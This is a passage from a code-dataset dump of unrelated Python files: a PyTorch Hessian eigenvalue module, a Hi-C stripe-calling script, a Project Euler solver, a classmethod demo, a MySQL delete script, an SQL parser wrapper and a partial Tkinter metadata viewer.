dic[visualizacoes[i]] = {nomes[i]}\n\nprint('Ordenamento:\\n')\nsorte = sorted(dic.items(), key=itemgetter(0))\nfor c in sorte:\n print(c)","sub_path":"BuscaWeb.py","file_name":"BuscaWeb.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"535852833","text":"# -*- coding: utf-8 -*-\nimport torch\n\nfrom pcode.measures.power_iter import Operator, deflated_power_iteration\n\n\n\"\"\"evaluate the top-k eigenvalues/eigenvector of the hessian.\n\nThis module defines a linear operator to compute the hessian-vector product\nfor a given pytorch model using subsampled data.\n\"\"\"\n\n\nclass HVPOperator(Operator):\n \"\"\"\n Use PyTorch autograd for Hessian Vec product calculation\n model: PyTorch network to compute hessian for\n dataloader: pytorch dataloader that we get examples from to compute grads\n loss: Loss function to descend (e.g. 
F.cross_entropy)\n    use_gpu: use cuda or not\n    max_samples: max number of examples per batch using all GPUs.\n    \"\"\"\n\n    def __init__(self, model, dataloader, criterion, use_gpu=True, max_samples=512):\n        size = int(sum(p.numel() for p in model.parameters()))\n        super(HVPOperator, self).__init__(size)\n        self.grad_vec = torch.zeros(size)\n        self.model = model\n        if use_gpu:\n            self.model = self.model.cuda()\n        self.dataloader = dataloader\n        # Make a copy since we will go over it a bunch\n        self.dataloader_iter = iter(dataloader)\n        self.criterion = criterion\n        self.use_gpu = use_gpu\n        self.max_samples = max_samples\n\n    def apply(self, vec):\n        \"\"\"\n        Returns H*vec where H is the hessian of the loss w.r.t.\n        the vectorized model parameters\n        \"\"\"\n        # compute original gradient, tracking computation graph\n        self.zero_grad()\n        grad_vec = self.prepare_grad()\n        # compute the product\n        grad_product = torch.sum(grad_vec * vec)\n        self.zero_grad()\n        # take the second gradient\n        grad_grad = torch.autograd.grad(grad_product, self.model.parameters())\n        # concatenate the results over the different components of the network\n        hessian_vec_prod = torch.cat([g.contiguous().view(-1) for g in grad_grad])\n        return hessian_vec_prod\n\n    def zero_grad(self):\n        \"\"\"\n        Zeros out the gradient info for each parameter in the model\n        \"\"\"\n        for p in self.model.parameters():\n            if p.grad is not None:\n                p.grad.data.zero_()\n\n    def prepare_grad(self):\n        \"\"\"\n        Compute gradient w.r.t loss over all parameters and vectorize\n        \"\"\"\n        try:\n            all_inputs, all_targets = next(self.dataloader_iter)\n        except StopIteration:\n            self.dataloader_iter = iter(self.dataloader)\n            all_inputs, all_targets = next(self.dataloader_iter)\n\n        num_chunks = max(1, len(all_inputs) // self.max_samples)\n\n        # accumulator for the flattened gradient; None until the first chunk\n        # (truth-testing a multi-element tensor would raise a RuntimeError)\n        grad_vec = None\n\n        input_chunks = all_inputs.chunk(num_chunks)\n        target_chunks = all_targets.chunk(num_chunks)\n        for input, target in zip(input_chunks, target_chunks):\n            if self.use_gpu:\n                input = input.cuda()\n                target = target.cuda()\n\n            output = self.model(input)\n            loss = self.criterion(output, target)\n            grad_dict = torch.autograd.grad(\n                loss, self.model.parameters(), create_graph=True\n            )\n            if grad_vec is not None:\n                grad_vec += torch.cat([g.contiguous().view(-1) for g in grad_dict])\n            else:\n                grad_vec = torch.cat([g.contiguous().view(-1) for g in grad_dict])\n        grad_vec /= num_chunks\n        self.grad_vec = grad_vec\n        return self.grad_vec\n\n\ndef compute_hessian_eigenthings(\n    model,\n    dataloader,\n    criterion,\n    num_eigenthings=10,\n    power_iter_steps=20,\n    power_iter_err_threshold=1e-4,\n    momentum=0.0,\n    use_gpu=True,\n    max_samples=512,\n):\n    \"\"\"\n    Computes the top `num_eigenthings` eigenvalues and eigenvecs\n    for the hessian of the given model by using subsampled power iteration\n    with deflation and the hessian-vector product\n    \"\"\"\n    hvp_operator = HVPOperator(\n        model, dataloader, criterion, use_gpu=use_gpu, max_samples=max_samples\n    )\n    eigenvals, eigenvecs = deflated_power_iteration(\n        hvp_operator,\n        num_eigenthings,\n        power_iter_steps,\n        power_iter_err_threshold,\n        momentum=momentum,\n        use_gpu=use_gpu,\n    )\n    return eigenvals, eigenvecs\n\n\n\"\"\"evaluate the dominant eigenvalues of the hessian.\"\"\"\n\n#\n# @file Different utility functions\n# Copyright (c) Zhewei Yao, Amir Gholami\n# All rights reserved.\n# This file is part of HessianFlow library.\n#\n# HessianFlow is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of 
the License, or\n# (at your option) any later version.\n#\n# HessianFlow is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with HessianFlow. If not, see <http://www.gnu.org/licenses/>.\n#\n\n\ndef get_eigen(model, inputs, targets, criterion, cuda=True, maxIter=50, tol=1e-3):\n \"\"\"\n compute the top eigenvalues of model parameters and\n the corresponding eigenvectors.\n \"\"\"\n if cuda:\n inputs, targets = inputs.cuda(), targets.cuda()\n device = \"cuda\"\n else:\n device = \"cpu\"\n\n model.eval()\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n loss.backward(create_graph=True)\n\n params, gradsH = get_params_grad(model)\n v = [torch.randn(p.size()).to(device) for p in params]\n v = normalization(v)\n\n eigenvalue = None\n\n for _ in range(maxIter):\n model.zero_grad()\n Hv = hessian_vector_product(gradsH, params, v)\n eigenvalue_tmp = group_product(Hv, v).cpu().item()\n v = normalization(Hv)\n\n if eigenvalue is None:\n eigenvalue = eigenvalue_tmp\n else:\n if abs(eigenvalue - eigenvalue_tmp) < tol:\n return eigenvalue_tmp, v\n else:\n eigenvalue = eigenvalue_tmp\n return eigenvalue, v\n\n\ndef get_eigen_full_dataset(\n model, dataloader, criterion, cuda=True, maxIter=50, tol=1e-3\n):\n \"\"\"\n compute the top eigenvalues of model parameters and\n the corresponding eigenvectors with a full dataset.\n Notice, this is very expensive.\n \"\"\"\n if cuda:\n device = \"cuda\"\n else:\n device = \"cpu\"\n model.eval()\n\n params, _ = get_params_grad(model)\n v = [torch.randn(p.size()).to(device) for p in params]\n v = normalization(v)\n\n batch_size = None\n eigenvalue = None\n\n for _ in range(maxIter):\n THv = [torch.zeros(p.size()).to(device) for p in params]\n counter = 0\n for inputs, targets in dataloader:\n\n if batch_size is None:\n batch_size = targets.size(0)\n\n if targets.size(0) < batch_size:\n continue\n\n model.zero_grad()\n outputs = model(inputs.to(device))\n loss = criterion(outputs, targets.to(device))\n loss.backward(create_graph=True)\n\n params, gradsH = get_params_grad(model)\n Hv = torch.autograd.grad(\n gradsH, params, grad_outputs=v, only_inputs=True, retain_graph=False\n )\n\n THv = [THv1 + Hv1 + 0.0 for THv1, Hv1 in zip(THv, Hv)]\n counter += 1\n\n eigenvalue_tmp = group_product(THv, v).cpu().item() / float(counter)\n v = normalization(THv)\n\n if eigenvalue is None:\n eigenvalue = eigenvalue_tmp\n else:\n if abs(eigenvalue - eigenvalue_tmp) < tol:\n return eigenvalue_tmp, v\n else:\n eigenvalue = eigenvalue_tmp\n\n return eigenvalue, v\n\n\ndef group_product(xs, ys):\n \"\"\"\n the inner product of two lists of variables xs,ys\n :param xs:\n :param ys:\n :return:\n \"\"\"\n return sum([torch.sum(x * y) for (x, y) in zip(xs, ys)])\n\n\ndef group_add(params, update, alpha=1):\n \"\"\"\n params = params + update*alpha\n :param params: list of variable\n :param update: list of data\n :return:\n \"\"\"\n for i, _ in enumerate(params):\n params[i].data.add_(update[i] * alpha)\n return params\n\n\ndef normalization(v):\n \"\"\"\n normalization of a list of vectors\n return: normalized vectors v\n \"\"\"\n s = group_product(v, v)\n s = s ** 0.5\n s = s.cpu().item()\n v = [vi / (s + 1e-6) for vi in v]\n return v\n\n\ndef get_params_grad(model):\n \"\"\"\n get model parameters and corresponding 
gradients\n \"\"\"\n params = []\n grads = []\n for param in model.parameters():\n params.append(param)\n if param.grad is None:\n continue\n grads.append(param.grad + 0.0)\n return params, grads\n\n\ndef hessian_vector_product(gradsH, params, v):\n \"\"\"\n compute the hessian vector product of Hv, where\n gradsH is the gradient at the current point,\n params is the corresponding variables,\n v is the vector.\n \"\"\"\n hv = torch.autograd.grad(\n gradsH, params, grad_outputs=v, only_inputs=True, retain_graph=True\n )\n return hv\n","sub_path":"tasks/computer-vision/pytorch/pcode/measures/hessian_flow.py","file_name":"hessian_flow.py","file_ext":"py","file_size_in_byte":9178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"404704303","text":"import os\nimport re\nimport numpy as np\nfrom scipy.signal import find_peaks\nfrom scipy.stats import kruskal, poisson\n\n\ndef hic2txt(hic_file, ch, resolution=1000, output='temp.txt'):\n \"\"\"\n Dump .hic file into contact lists\n :param hic_file: (str) .hic file path\n :param ch: (str) chromosome\n :param resolution: (int) resolution to use\n :param output: (str) temporary output path\n \"\"\"\n # cmd = f'java -jar {juicer} dump observed KR {hic_file} {ch} {ch} BP {resolution} {output}'\n cmd = f'java -jar {juicer} dump oe KR {hic_file} {ch} {ch} BP {resolution} {output}'\n os.system(cmd)\n\n\ndef load_chrom_sizes(reference_genome):\n \"\"\"\n Load chromosome sizes for a reference genome\n \"\"\"\n my_path = os.path.abspath(os.path.dirname(__file__))\n rg_path = f'{my_path}/reference_genome/{reference_genome}'\n f = open(rg_path)\n lengths = {}\n for line in f:\n [ch, l] = line.strip().split()\n lengths[ch] = int(l)\n return lengths\n\n\ndef txt2horizontal(txt, length, max_range, resolution=1000):\n \"\"\"\n :param txt: str, path of input .txt file\n :param length: chromosome length\n :param max_range: int, max distance\n :param resolution: int, default: 25000\n \"\"\"\n assert max_range % resolution == 0\n f = open(txt)\n n_bins = length // resolution + 1\n rg = max_range // resolution\n mat = np.zeros((n_bins, rg))\n cnt = 0\n for line in f:\n if cnt % 5000000 == 0:\n print(' ', cnt)\n cnt += 1\n p1, p2, v = line.strip().split()\n if v == 'NaN':\n continue\n p1, p2, v = int(p1), int(p2), float(v)\n if max(p1, p2) >= n_bins * resolution:\n continue\n if p1 > p2:\n p1, p2 = p2, p1\n p1, p2 = p1 // resolution, p2 // resolution\n if p2 - p1 >= rg:\n continue\n mat[p1, p2 - p1] += v\n return mat\n\n\ndef txt2vertical(txt, length, max_range, resolution=1000):\n \"\"\"\n :param txt: str, path of input .txt file\n :param length: chromosome length\n :param max_range: int, max distance\n :param resolution: int, default: 25000\n \"\"\"\n assert max_range % resolution == 0\n f = open(txt)\n n_bins = length // resolution + 1\n rg = max_range // resolution\n mat = np.zeros((n_bins, rg))\n cnt = 0\n for line in f:\n if cnt % 5000000 == 0:\n print(' ', cnt)\n cnt += 1\n p1, p2, v = line.strip().split()\n if v == 'NaN':\n continue\n p1, p2, v = int(p1), int(p2), float(v)\n if max(p1, p2) >= n_bins * resolution:\n continue\n if p1 > p2:\n p1, p2 = p2, p1\n p1, p2 = p1 // resolution, p2 // resolution\n if p2 - p1 >= rg:\n continue\n mat[p2, p2 - p1] += v\n return mat\n\n\ndef pick_max_positions(mat, interval=10000, distance_range=(10000, 160000), resolution=1000,\n line_width=1, window_size=10):\n assert interval % resolution == 0\n assert distance_range[0] % resolution == 0\n assert distance_range[1] % 
resolution == 0\n\n st, ed = distance_range[0] // resolution, distance_range[1] // resolution\n size = interval // resolution\n length = mat.shape[0]\n stats = np.sum(mat[:, st:ed], axis=1)\n all_pos = []\n for i in range(0, length, size):\n region = stats[i: min(i + size, length)]\n idx = int(np.argmax(region) + i)\n # print(idx, window_size, mat.shape[0] - window_size)\n\n if idx < window_size or idx >= mat.shape[0] - window_size:\n continue\n\n previous = stats[max(0, idx - size): idx-1]\n later = stats[idx + 2: min(idx + size + 1, length)]\n # print(stats[idx], np.max(previous), np.max(later))\n\n if stats[idx] > np.max(previous) and stats[idx] > np.max(later):\n # print(idx)\n check = enrichment_score(mat, idx, line_width,\n (st, ed), window_size)\n if np.sum(check) > 0:\n all_pos.append(idx)\n return all_pos\n\n\ndef pick_max_positions2(mat, distance_range=(10, 160), line_width=1, window_size=10):\n st, ed = distance_range\n stats = np.sum(mat[:, st:ed], axis=1)\n all_pos = []\n\n all_peaks, _ = find_peaks(stats, distance=window_size*2)\n for idx in all_peaks:\n check = enrichment_score(mat, idx, line_width, (st, ed), window_size)\n if np.sum(check) > 0:\n all_pos.append(idx)\n return all_pos\n\n\ndef enrichment_score(mat, idx, line_width=1, distance_range=(20, 40), window_size=10):\n # st, ed = max(distance_range[0], window_size), min(distance_range[1], mat.shape[1] - window_size)\n half = int(line_width // 2)\n x1, x2 = idx - half, idx - half + line_width\n\n new_mat = np.zeros((distance_range[1] - distance_range[0],))\n for j in range(distance_range[0], distance_range[1]):\n if j < window_size + half or j >= mat.shape[1] - window_size - half:\n continue\n y = j - distance_range[0]\n line_min = min(np.mean(mat[x1:x2, j-window_size-half:j-half]),\n np.mean(mat[x1:x2, j+1+half:j+window_size+half+1]))\n neighbor_mean = max(np.mean(mat[idx-window_size:x1, j-window_size-half:j+window_size+half+1]),\n np.mean(mat[x2+1:idx+window_size+1, j-window_size-half:j+window_size+half+1]))\n new_mat[y] = line_min - neighbor_mean\n return new_mat\n\n\ndef enrichment_score2(mat, idx, line_width=1, distance_range=(5, 100), window_size=10):\n # st, ed = max(distance_range[0], window_size), min(distance_range[1], mat.shape[1] - window_size)\n half = int(line_width // 2)\n x1, x2 = idx - half, idx - half + line_width\n\n new_mat = np.zeros((distance_range[1] - distance_range[0],))\n for j in range(distance_range[0], distance_range[1]):\n # print(j)\n if j < window_size + half or j >= mat.shape[1] - window_size - half:\n continue\n y = j - distance_range[0]\n # line_min = np.median(np.concatenate(\n # [mat[x1:x2, j-window_size-half:j-half], mat[x1:x2, j+1+half:j+window_size+half+1]]\n # ))\n line_min = np.median(\n [mat[x1:x2, j - window_size - half:j + window_size + half + 1]]\n )\n neighbor_mean = max(np.mean(mat[idx-window_size:x1, j-window_size-half:j+window_size+half+1]),\n np.mean(mat[x2+1:idx+window_size+1, j-window_size-half:j+window_size+half+1]))\n # print(line_min, neighbor_mean)\n\n lower_b = 0.2\n upper_mlogp = 10\n _exp = max(neighbor_mean, lower_b)\n\n Poiss = poisson(_exp)\n p_val = 1 - Poiss.cdf(line_min)\n new_mat[y] = new_mat[y] = min(- np.log10(p_val), upper_mlogp) if p_val > 0 else upper_mlogp\n return new_mat\n\n\ndef find_max_slice(arr):\n _max, head, tail = 0, 0, 0\n _max_ending, h, t = 0, 0, 0\n i = 0\n while i < len(arr):\n _max_ending = _max_ending + arr[i]\n if _max_ending < 0:\n h, t = i + 1, i + 1\n _max_ending = 0\n else:\n t = i + 1\n if _max_ending > _max:\n head, tail, 
_max = h, t, _max_ending\n i += 1\n return head, tail, _max\n\n\ndef merge_positions(lst, merge_range):\n def _merge(small_lst):\n st = min([elm[0] for elm in small_lst])\n ed = max([elm[1] for elm in small_lst])\n head = min([elm[2] for elm in small_lst])\n tail = max([elm[3] for elm in small_lst])\n score = max([elm[4] for elm in small_lst])\n return [st, ed, head, tail, score]\n\n new_lst = []\n temp = []\n for i, (idx, head, tail, score) in enumerate(lst):\n if i == 0:\n temp.append([idx, idx, head, tail, score])\n elif idx - temp[-1][1] <= merge_range:\n temp.append([idx, idx, head, tail, score])\n else:\n new_lst.append(_merge(temp))\n temp = [[idx, idx, head, tail, score]]\n new_lst.append(_merge(temp))\n return new_lst\n\n\ndef stat_test(mat, st, ed, line_width, head, tail, window_size):\n half = int(line_width // 2)\n x1, x2 = st - half, ed + half + 1\n r1 = mat[x1-window_size:x1, head:tail].flatten()\n r2 = mat[x2:x2+window_size, head:tail].flatten()\n r = mat[x1:x2, head:tail].flatten()\n\n t1, p1 = kruskal(r, r1)\n t2, p2 = kruskal(r, r2)\n return max(p1, p2)\n\n\ndef _stripe_caller(mat, max_range=150000, resolution=1000,\n min_length=30000, closeness=50000,\n stripe_width=1, merge=1, window_size=8, threshold=0.01):\n assert max_range % resolution == 0\n assert min_length % resolution == 0\n\n # Step 2: for different distance ranges pick the \"local maximum\" positions\n print(' Finding local maximum for different contact distances...')\n positions = {}\n # Split the max range into small distance ranges\n for dis in range(0, max_range, min_length):\n _min = dis\n if dis + 2 * min_length > max_range:\n _max = max_range\n else:\n _max = dis + min_length\n print(f' {_min}-{_max}', end=' ')\n distance_range = (_min // resolution, _max // resolution)\n pos_h = pick_max_positions2(mat, distance_range=distance_range, line_width=stripe_width, window_size=window_size)\n print(len(pos_h))\n for p in pos_h:\n if p not in positions:\n positions[p] = []\n positions[p].append(distance_range)\n print(' Total:', len(positions))\n\n # Step 3: find the accurate range of stripe\n print(' Finding the spanning range for each stripe...')\n all_positions = []\n lst = sorted(positions.keys())\n for i, idx in enumerate(lst):\n # print(i, idx)\n if idx <= window_size or idx >= mat.shape[0] - window_size:\n continue\n arr = enrichment_score2(mat, idx, line_width=stripe_width,\n distance_range=(0, max_range // resolution),\n window_size=window_size)\n arr = arr + np.log10(threshold)\n head, tail, _max = find_max_slice(arr)\n all_positions.append((idx, head, tail, _max))\n\n # Step 4: Merging\n print(' Merging...')\n all_positions = merge_positions(all_positions, merge)\n print(len(all_positions))\n\n print(' Filtering by distance and length ...')\n new_positions = []\n for elm in all_positions:\n # print(elm, end=' ')\n if (elm[3] - elm[2]) * resolution >= min_length and elm[2] * resolution <= closeness:\n # print(True)\n new_positions.append(elm)\n else:\n # print(False)\n pass\n print(len(new_positions))\n\n # Step 5: Statistical test\n results = []\n print(' Tests...')\n for elm in new_positions:\n [st, ed, head, tail, score] = elm\n # p = stat_test(mat, st, ed, stripe_width, head, tail, window_size)\n # print(idx * resolution, p)\n # if score > threshold:\n results.append((st, (ed + 1), head, tail, score / (tail - head)))\n print(len(results))\n return results\n\n\ndef stripe_caller_all(\n hic_file,\n chromosomes,\n output_file,\n threshold=0.01,\n max_range=150000, resolution=1000,\n 
min_length=30000, closeness=50000,\n stripe_width=1, merge=1, window_size=8,\n reference_genome='hg38'\n):\n ch_sizes = load_chrom_sizes(reference_genome)\n\n f = open(output_file, 'w')\n f.write('#chr1\\tx1\\tx2\\tchr2\\ty1\\ty2\\tenrichment\\n')\n\n for ch in chromosomes:\n if ch == 'chr14':\n continue\n\n print(f'Calling for {ch}...')\n hic2txt(hic_file, ch, resolution=resolution, output='temp.txt')\n\n # horizontal\n mat = txt2horizontal('temp.txt', length=ch_sizes[ch], max_range=max_range + min_length, resolution=resolution)\n results = _stripe_caller(mat, threshold=threshold,\n max_range=max_range, resolution=resolution,\n min_length=min_length, closeness=closeness,\n stripe_width=stripe_width, merge=merge, window_size=window_size)\n for (st, ed, hd, tl, sc) in results:\n f.write(f'{ch}\\t{st*resolution}\\t{ed*resolution}\\t{ch}\\t{max((st+hd), ed)*resolution}\\t{(ed+tl)*resolution}\\t{sc}\\n')\n\n # vertical\n mat = txt2vertical('temp.txt', length=ch_sizes[ch], max_range=max_range + min_length, resolution=resolution)\n results = _stripe_caller(mat, threshold=threshold,\n max_range=max_range, resolution=resolution,\n min_length=min_length, closeness=closeness,\n stripe_width=stripe_width, merge=merge, window_size=window_size)\n for (st, ed, hd, tl, sc) in results:\n f.write(f'{ch}\\t{(st-tl)*resolution}\\t{min((ed-hd), st)*resolution}\\t{ch}\\t{st*resolution}\\t{ed*resolution}\\t{sc}\\n')\n\n f.close()\n\n\nif __name__ == '__main__':\n # HFF threshold: 50\n # hESC threshold: 40\n # chromosomes = [f'chr{i}' for i in list(range(1, 23)) + ['X']]\n juicer = '/nfs/turbo/umms-drjieliu/juicer_tools_1.11.04_jcuda.0.8.jar'\n chromosomes = ['chr1']\n\n hic_file = '/nfs/turbo/umms-drjieliu/proj/4dn/data/microC/HFF/raw/HFFc6.hic'\n thr = 0.01\n stripe_caller_all(\n hic_file=hic_file,\n chromosomes=chromosomes,\n output_file='HFF_MicroC_stripes_chr1.bedpe',\n threshold=thr\n )\n\n hic_file = '/nfs/turbo/umms-drjieliu/proj/4dn/data/microC/hESC/raw/H1-hESC.hic'\n thr = 0.01\n stripe_caller_all(\n hic_file=hic_file,\n chromosomes=chromosomes,\n output_file='H1_MicroC_stripes_chr1.bedpe',\n threshold=thr\n )\n\n # hic_file = '/nfs/turbo/umms-drjieliu/proj/4dn/data/bulkHiC/GM12878/GM12878.hic'\n # thr = 50\n # stripe_caller_all(\n # hic_file=hic_file,\n # chromosomes=chromosomes,\n # output_file='GM12878_HiC_stripes_chr1.bedpe',\n # threshold=thr,\n # max_range=5000000, resolution=25000,\n # min_length=1000000, closeness=1000000,\n # stripe_width=1, merge=1, window_size=8\n # )\n\n\n\n\n\n","sub_path":"Manuscript/fig2/02_fine_scale/stripe_caller/Quagga_V0.2.py","file_name":"Quagga_V0.2.py","file_ext":"py","file_size_in_byte":14117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"255583061","text":"import functools\nimport time\nstart = time.time()\n\nPrimes = [2,3,5,7,11,13,17]\n\nnbs = [9,8,7,6,5,4,3,2,1,0]\n\n@functools.lru_cache(maxsize=None)\ndef isSpecial(strNb):\n return int(strNb[len(strNb)-3:])%Primes[len(strNb)-4] == 0\n\nsum = 0\n\ndef getPande(arr, strNb):\n global sum\n if len(arr) == 0 :\n if isSpecial(strNb):\n return int(strNb)\n else :\n return 0\n else :\n if len(strNb) >= 4 :\n if not isSpecial(strNb) :\n return 0\n tempS = 0\n for i in range (0,len(arr)):\n tempS += getPande(arr[:i]+arr[i+1:],strNb+str(arr[i]))\n return tempS\n\nprint('Euler n°43 answer :',getPande(nbs,''))\nprint('Find in :', \"%.2f\" % 
(time.time()-start),'sec')\n","sub_path":"041-060/Euler_043.py","file_name":"Euler_043.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"82558011","text":"# @staticmethod nd @classmethod in python\n\nclass Student:\n\tdef __init__(self,name,school):\n\t\tself.name = name\n\t\tself.school = school\n\t\tself.marks = [10]\n\n\tdef addMarks(self,mark):\n\t\tself.marks.append(mark)\n\n\t@classmethod\n\tdef addFriend(*args):\n\t\tif len(args)==3:\n\t\t\treturn args[0](args[2],args[1].school)\n\t\telif len(args)==4:\n\t\t\treturn args[0](args[2],args[1].school,args[3])\n\nclass WorkingSudent(Student):\n\tdef __init__(self,name,school,salary):\n\t\tsuper().__init__(name,school)\n\t\tself.salary = salary\n\nanna = WorkingSudent(\"Anna\",\"MIT\",234)\nanna.addMarks(50)\nprint('{} studies in {} school. Her salary is ${}. Her marks are {}'.format(anna.name,anna.school,anna.salary,anna.marks))\n\ngreg = WorkingSudent.addFriend(anna,\"Greg\",325)\ngreg.addMarks(80)\nprint('{} studies in {} school. His salary is ${}. His marks are {}'.format(greg.name,greg.school,greg.salary,greg.marks))\n\nrachel = Student('Rachel','Stanford')\nrachel.addMarks(60)\nprint('{} studies in {} school. Her marks are {}'.format(rachel.name,rachel.school,rachel.marks))\n\nsam = Student.addFriend(rachel,'Sam')\nsam.addMarks(85)\nprint('{} studies in {} school. His marks are {}'.format(sam.name,sam.school,sam.marks))","sub_path":"section 2/static_and_class_methods.py","file_name":"static_and_class_methods.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"59296435","text":"import datetime\nimport mysql.connector\n\ncnx = mysql.connector.connect(user='root', database='bajaj_insurance', port=3306, host=\"localhost\")\n\ncursor = cnx.cursor()\n\n# query = \"UPDATE insurance_transaction set transaction_id = 'abhishek tomar' where idinsurance_transaction=1\"\nquery = \"DELETE from insurance_transaction where idinsurance_transaction = 1\"\n\n\ncursor.execute(query)\n\n# this will give you results count which are affected....\ncursor.rowcount\n\n\nprint(\"result : \" + str(cursor.rowcount))\n\n\ncursor.close()\ncnx.commit()\ncnx.close()","sub_path":"batch_3/session_6/3_delete_sql.py","file_name":"3_delete_sql.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"205597947","text":"from typing import List, Optional\n\nimport sql_metadata\nfrom sql_metadata import Parser, QueryType\n\nDDL = {QueryType.CREATE, QueryType.DROP, QueryType.ALTER, QueryType.SELECT}\nDML = {QueryType.INSERT, QueryType.UPDATE, QueryType.DELETE}\n\n\nclass ParseSqlError(Exception):\n ...\n\n\nclass UnsupportedQueryType(ParseSqlError):\n ...\n\n\nclass SqlStatement:\n def __init__(self, sql: str, skip_wc: bool = True):\n self.inputs: Optional[List[str]] = []\n self.outputs: Optional[List[str]] = []\n self.comments: Optional[List[str]] = []\n self.skip_wc = skip_wc\n\n self._columns: Optional[List[str]] = []\n self._sql = sql\n\n self.parse_sql()\n\n @property\n def columns(self) -> List[str]:\n return self._columns\n\n @columns.setter\n def columns(self, columns: List[str]):\n if self.skip_wc:\n self._columns = [col for col in columns if \"*\" not in col]\n else:\n self._columns = columns\n\n def parse_sql(self) -> None:\n parser = sql_metadata.Parser(self._sql)\n\n try:\n 
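# Parser.query_type may raise ValueError for statements it cannot\n            # classify; the except clause below re-raises it as UnsupportedQueryType\n            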
query_type: str = parser.query_type\n\n if query_type in DDL:\n self.__parse_ddl(parser)\n elif query_type in DML:\n self.__parse_dml(parser)\n else:\n raise ValueError(f\"Unsupported type {query_type}\")\n\n self.comments = parser.comments\n\n except ValueError as e:\n raise UnsupportedQueryType from e\n\n def __parse_dml(self, parser: Parser):\n self.outputs = parser.tables\n self.columns = parser.columns\n\n def __parse_ddl(self, parser: Parser):\n self.inputs = parser.tables\n self.columns = parser.columns\n","sub_path":"odd_models/sql_parser.py","file_name":"sql_parser.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"26739961","text":"##\n# Initiates the EXIF tab\n##\ndef tab_init(t):\n\tif t == \"exif\":\n\t\ttext = \"EXIF - Edition\";\n\t\tcurr = tabExif;\n\telif t == \"xmp\":\n\t\ttext = \"XMP - Edition\";\n\t\tcurr = tabXmp;\n\telif t == \"iptc\":\n\t\ttext = \"IPTC - Edition\";\n\t\tcurr = tabIptc;\n\telse:\n\t\tlabel = Label(tabExif, text=\"EXIF - Edition\", font=13);\n\t\tlabel.grid(row=1, column=1, rowspan=2);\n\t\tlabel = Label(tabXmp, text=\"XMP - Edition\", font=13);\n\t\tlabel.grid(row=1, column=1, rowspan=2);\n\t\tlabel = Label(tabIptc, text=\"IPTC - Edition\", font=13);\n\t\tlabel.grid(row=1, column=1, rowspan=2);\n\t\treturn 1;\n\tlabel = Label(curr, text=text, font=13);\n\tlabel.grid(row=1, column=1, rowspan=2);\n\tif src == \"\":\n\t\ttext = \"You may select a file first!\";\n\telse:\n\t\ttext = \"File path is incorrect!\";\n\tlabel = Label(curr, text=text, padx=20 ,justify=\"left\");\n\tlabel.grid(row=3, column=1);\n\n##\n# Files the tab\n##\ndef tab_fill(t, buffer):\n\tif t == \"exif\":\n\t\tcurr = tabExif;\n\telif t == \"xmp\":\n\t\tcurr = tabXmp;\n\telif t == \"iptc\":\n\t\tcurr = tabIptc;\n\telse:\n\t\treturn 0;\n\ty = 3;\n\tif buffer is not None:\n\t\tfor value in buffer:\n\t\t\tlabel = Label(curr, text=value.replace(\".\",\" \"), justify=\"left\");\n\t\t\tlabel.grid(row=y, column=1);\n\t\t\tlabel = Entry(curr);\n\t\t\tlabel.name = value;\n\t\t\tlabel.insert(0, buffer[value]);\n\t\t\tlabel.grid(row=y, column=2, pady=3, padx=3);\n\t\t\ty += 1;\n\n##\n# GUI properly speaking\n##\n\n#Let's create the GUI\n## Window\nwindow = Tk();\nwindow.title(\"EXIF-IPTC-XMP Viewer\");\nwindow.geometry(\"900x700+200+50\");\n\n## Tabs\ntabManager = Notebook(window);\n\n## Inner Frames\nleft = Frame(window);\ntabExif = Frame(tabManager);\ntabIptc = Frame(tabManager);\ntabXmp = Frame(tabManager);\n\n## Adding tabs to tab_bar\ntabManager.add(tabExif, text=\"EXIF\");\ntabManager.add(tabIptc, text=\"IPTC\");\ntabManager.add(tabXmp, text=\"XMP\");\n\n## Title-label\ntitle = Label(left, text=\"EXIF-IPTC-XMP Viewer\", pady=\"10px\", font=13);\ntitle.pack();\n\n## Adding Frames\nleft.pack(side=\"left\", fill=\"both\", expand=0, padx=10);\ntabManager.pack(fill=\"both\", side=\"right\", expand=1);\n\n# LEFT SIDE\nphoto = ImageTk.PhotoImage( Image.open(\"blank.png\") );\nimageBox = Label(left, image=photo);\nimageBox.pack();\n\n## File name label\ntext = \"File name : \";\nlabel = Label(left, text=text);\nlabel.pack();\nsrcEntry = Label(left, text=\"Please select one.\");\nsrcEntry.pack();\n\n## Active Button\nopenButton = Button(left, text=\"Open Image\");\nopenButton.pack(fill=\"x\", padx=\"10px\", pady=\"3px\");\n\n## Active Button\napplyButton = Button(left, text=\"Apply Changes\");\n'''applyButton.pack(fill=\"x\", padx=\"10px\", pady=\"3px\");'''\n\n# EXIF 
